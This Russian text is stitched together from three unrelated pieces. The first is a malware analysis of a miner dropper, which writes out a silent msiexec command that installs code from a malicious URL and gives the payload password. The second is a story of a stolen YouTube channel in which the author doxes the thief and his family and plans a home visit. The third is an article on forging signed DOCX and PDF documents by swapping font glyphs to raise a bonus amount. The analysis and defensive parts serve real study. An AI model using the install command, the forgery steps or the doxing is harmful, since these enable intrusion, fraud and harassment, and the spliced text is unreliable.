После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Ну хоть не соврал о своем местоположении. Или VPN?
Далее он скинул мне почту(аккаунт), которую надо назначить владельцем и... второй звоночек...
Название аккаунта " GG HACKERS ".

Хм, ну ладно, давайте уже ближе к сделке.
Как же все таки выглядит это окно?

Синим подчеркнуты мои аккаунты. Как вы можете заметить я являюсь основным владельцем канала и больше никто другой. ( Скриншот сделан со второго аккаунта и там видно, что редактировать роль выше нельзя(!) ).

Объясню суть. Я долго пытался понять эту систему, да я еще и не ложился после той ночи, вот как я понял: канал привязывается к странице google+, чтобы появилась возможность создавать так называемые бренды, которые позволяют назначать администраторов, модераторов.

Выглядит это как на картинке сверху(аккаунт(почта)+канал). Далее вы открываете меню с должностями и уже туда приглашаете вступить другие аккаунты (не каналы).
Для тех кто ничего не понял ( https://youtu.be/JCrYVl-LyWw ).

Далее я назначаю его владельцем.

И происходит следующий диалог.

Я бегу в YouTube и там канала нет. Только аккаунт.

Канал же принял логотип его почты, хм... как же так.
Я долго не мог понять. Как меня ОСНОВНОГО ВЛАДЕЛЬЦА канала, просто выкинули.
Парень почему-то не кинул меня в чс, а начал отрицать свою вину.

Конечно виноват я, ведь я как-то собирался обмануть его, а он смог раскусить мой злобный план(??)!
Дальше лучше: Встретимся в Москве, когда я полечу в Польшу домой.
В общем, почитайте сами:

К этому времени ко мне уже подъехал друг, так как я был мягко говоря в ах... небольшом шоке и мне было тяжело справиться, ведь столько работы просто пропало бесследно в один миг.

Два раза запутался в каком же аэропорту он будет, а потом и вовсе предложил обсудить как его величество вернется в Польшу. Но мы же не тупые, понимали, что он тянет время до завтра, а значит за это время должно что-то произойти. Значит мы как-то можем вернуть канал, отменить изменения. (Как оказалось позже это никакой роли не играет, через 24 часа он становится гл. владельцем)
И я начал строчить в поддержку YouTube и Гугл, что вот мол, случайно передал аккаунт человеку, а он его можно сказать украл. Я истинный владелец, могу доказать, что я владел каналом с самого его начала.

После отправки, я надеялся только на тех. поддержку, но наткнулся на похожий вопрос, где человека отправили гулять, так как он продавал аккаунт (он так и написал в жалобе). Я подумал, что я вроде не указывал это, и я могу миновать похожий результат.
Надежда еще была.

Тем не менее, начали писать другие люди с вопросами о покупке, я же у них спрашивал помощи, так как они более опытные чем я. Вот что сказала одна из них:

Да как же так? Я же владелец! Законный! Поддержка точно должна помочь и я стал ждать ответа, попутно беседуя со своим "другом", который почему-то начал заметно добреть.

Жалость? Почему бы и нет. Может передумает, да и с сердцем действительно в последнее время было не очень то все хорошо.

Парень уже начал швыряться деньгами налево и направо. Уже обследование мне оплатит и канал даже вернет, только до завтра надо подождать.

Чкаловский, Жуковский, Шереметьево... WAT?
Парень явно запутался.
Дальше он меня пытается убедить, что он из Польши (зачем?) и кидает смс, что якобы добро пожаловать в польшу, но скрины с разных телефонов, разные операторы. Ну и конечно оправдание: время между ними прошло достаточно, что нашел под рукой.
В это время мы, уже изрядно изучив все форумы почти не оставили надежды на поддержку, и решили деанонить парня, так как мы знали его айпишник, не проблемой было утром позвонить и узнать адрес, просто грамотно заболтать, а дальше уже наведаться домой. Это было крайний вариант, если мы ничего не найдем, но мы продолжали копать глубже.

Я бы придумал здесь челендж для лиги детективов, но мне жалко их время, да и оно того не стоит.

Первая его ошибка: он прислал свою почту с явным ником. Типо: Sanekredarmy(пример).
По нему мы и пошли. Вышли на его ютуб канал без информации, но зато мы видели подписки:
САМП, Майнкрафт. Так, понятно, наш дружок не очень взрослый. Вышли на facebook, где стояла такая же аватарка, что у страницы-разводилы в ВК, только имя уже совпадало, с тем, что в нике.
А что скрывать? Зовут его Игорь.

Поехали дальше, мы понимаем, что уже близко. Вбиваем в Вконтакте его имя в поиск и ставим нужный город. Куча пустых аккаунтов. И сначала нам попался радиоведущий с его города, мы не могли поверить, что этот парень разводит на ютуб каналы, и изучив его фото, видео, подписки поняли, что ничего общего с нужным нам Игорем он не имеет.

А вот следующие аккаунты уже были интереснее. Парень явно часто менял страницы, мы нашли штуки 4-5, и все без фото. Имя совпадало, некоторые друзья тоже, так мы и дошли до одной живой. Заходил на 4 минуты раньше, чем наш герой, который ушел спать.
Ага, чекаем друзей. Сестра, далее отец и вся семья, а там и до семейных фото недалеко.
Но нам надо было знать, что это точно он, чтобы идти в атаку и выкладывать все карты.

Утро.
Изучив все в интернете, что связано с этим парнем, мы дожидаемся его подъема.
И я ему пишу:

Ой, как же так получилось... Очень жаль. На аккаунте действительно не было моего канала, но логотип моего канала уже сменился, как и название, а значит что он переехал на другой адрес.
Заходим в почту, а далее в корзине находим письмо 10 минутной давности:

Вот так совпадение! Имя нового владельца полностью совпадает с тем именем, что мы нашли в ВК.
Еще немного покопавшись, мы наткнулись, что аккаунт привязан к телефону и все синхронизируется, в том числе и запросы в поисковике:

Изрядно посмеявшись, мы уже без капли сомнений, что перед нами тот самый парень, пишем ему.

Вы посмотрите, как быстро вопрос решился. Через 10 минут его же способом, мы вернули канал себе, а его аккаунт вернули ему обратно, но он продолжал зачем-то рассказывать сказки.

Кстати, к концу все этой истории пришел ответ от YouTube.

Очень огорчило, что мало того, что уязвимость до сих пор жива, так и то, что ей активно пользуются, зная, что поддержка не поможет.
Если бы мы не нашли парня, то я бы потерял канал, просто нажав одну кнопку.

Спасибо, что дочитали до конца.
Вы конечно можете сами найти это парня, но я думаю, что ему хватило. Тем более он вернул аккаунт.
Не стал описывать все подробно, чтобы избежать воды в рассказе. Если есть какие-то вопросы, то я с радостью отвечу. (Кроме вопросов о самом баге).

Про уязвимость я рассказывать не хочу, так как метод может просто выйти в массы, что повлечет за собой еще больше разводов. Достаточно знать, что нельзя человеком делать "Владельцем" канала не при каких обстоятельствах.

Спасибо еще раз за внимание. Не дайте себя обмануть!

Реализуем атаку:

• Нужно заменить оборудование Поставщика А на оборудование Поставщика Б изменением nothing.dwg, расположенного на сетевом ресурсе;

• Отдел снабжения получает электронный подлинник HVAC.dwg, руководитель отдела проверяет целостность электронной подписи, она не нарушена, а AutoCAD развеивает последнюю тень сомнения успокаивающей надписью «Чертеж не изменился с момента подписания», поэтому вместо Поставщика А заказ на оборудование уходит к Поставщику Б

Сценарий с документом DOC/DOCX, вектор атаки — шрифт

В этот раз будем использовать наиболее продвинутый комплекс защиты информации КриптоПро CSP 4.0, соответствующий стандарту ГОСТ Р 34.10-2012:

• Создаём приказ о премировании сотрудников prikaz.docx. Основной текст набираем шрифтом Arial. Для размера премии используем похожий шрифт, например, бесплатный Noto Sans Regular от Google. Вводим согласованный с директором размер премии 150 000 руб.;

• Устанавливаем шрифт Noto Sans Regular на компьютер директору и бухгалтеру (понадобятся права администратора);

• Отправляем приказ на подпись директору;

• Директор подписывает prikaz.docx усиленной квалифицированной ЭП с помощью КриптоПро Office Signature 2.0. Получаем электронный подлинник:

Реализуем атаку:

• С помощью бесплатной программы FontForge модифицируем файл шрифта NotoSans-Regular.ttf, заменив векторное изображение глифа 1 на изображение глифа 2

• Модифицированный NotoSans-Regular.ttf файл заменяем на компьютере бухгалтера [и ждём премию];

• Получив подписанный директором подлинник приказа, бухгалтер открывает его и видит действительную подпись. Но размер премии увеличился со 150 000 руб. до 250 000 руб. Здесь важно знать меру, можно было заменить 1 на 9, но это будет слишком заметно.

Это эффективные, но не единственные способы атаки. Есть еще макросы, вычисляемые значения полей, стили. Не защитит от них ни использование системы управления данными (PDM), ни откреплённые подписи, ни применение специализированных криптографических комплексов типа КриптоПро CSP.

Как же обеспечить защиту от такого рода атак? Самый эффективный способ — публиковать документы в нередактируемый формат или формат фиксированной разметки. Эти форматы нацелены на сохранение первоначального вида документа на любом устройстве, в любой точке мира. Вот наиболее распространённые представители форматов фиксированной разметки:

• PDF (Portable Document Format) — разработан компанией Adobe. Стандарт ISO 32000;

• XPS (XML Paper Specification) — разработан компанией Microsoft. Стандарт ECMA-388;

• DWFx — разработан компанией Autodesk. Основан на XPS.

Но и здесь не всё так однозначно. Попробуем провести атаку через шрифт на подписанный PDF-документ:

• Документ prikaz.docx опубликуем в PDF, например, с помощью виртуального принтера PDF-XChange. Полученный файл prikaz.pdf отправляем на подпись директору;

• Директор открывает документ prikaz.pdf в программе Adobe Acrobat Reader DC;

• Подписывает командой "Поставить цифровую подпись" в разделе "Сертификаты".

• Подписанный PDF отправляется бухгалтеру.

Реализуем атаку:

• Так же как и в сценарии с форматом DOCX устанавливаем бухгалтеру модифицированный шрифт NotoSans-Regular.ttf;

• Получив подписанный prikaz.pdf, бухгалтер открывает его в Adobe Reader и видит размер премии 250 000 руб., целостность подписи при этом не нарушена

Для PDF удалось реализовать данный вид атаки потому, что этот формат допускает использование шрифтов по ссылке, поэтому он не подходит для создания подлинников.Существует стандарт PDF/A (подмножество PDF), который обеспечивает необходимую защиту. Поэтому перед подписанием каждого PDF необходимо убедиться, что документ соответствует стандарту PDF/A или отсутствуют зависимости от шрифтов.

Форматы DWFx и XPS не подвержены такого рода атакам, так как на уровне стандарта ECMA-388 регламентируется хранение ресурсов внутри содержательной части документов (F.3.1 M2.6). Но DWFx не подходит для создания многостраничных текстовых документов, поэтому наиболее универсальным вариантом является XPS.

Попробуем по аналогии с PDF провести атаку через шрифт на подписанный XPS-документ:

• Документ prikaz.docx опубликуем в XPS с помощью встроенного в Windows виртуального принтера Microsoft XPS Document Writer. Полученный файл prikaz.xps отправляем на подпись директору;

• Директор открывает документ prikaz.xps в программе Pilot-ICE или в Pilot-XPS. Подписывает командой «Подписать» через КриптоПро CSP;

• Подписанный XPS отправляется бухгалтеру.

Реализуем атаку:

• Устанавливаем бухгалтеру модифицированный шрифт NotoSans-Regular.ttf;

• Получив подписанный prikaz.xps, бухгалтер открывает его в Pilot-ICE, проверяет целостность ЭП и видит тот же размер премии, который был на момент подписания документа — 150 000 руб. Атака на XPS не удалась.

Итоги

Усиленная квалифицированная электронная подпись по прежнему является надёжной технологией для обнаружения факта внесения изменений в документ. Но следует комплексно оценивать эффективность её применения. Эксперимент показал, что редактируемые форматы DWG, DOC, DOCX не подходят для создания электронных подлинников, так как могут быть легко скомпрометированы. Более защищенными и универсальными для создания подлинников являются форматы PDF/А и XPS, так как они содержат всю необходимую информацию для того, чтобы каждый раз отображать документ в неизменном виде.

Дмитрий Поскребышев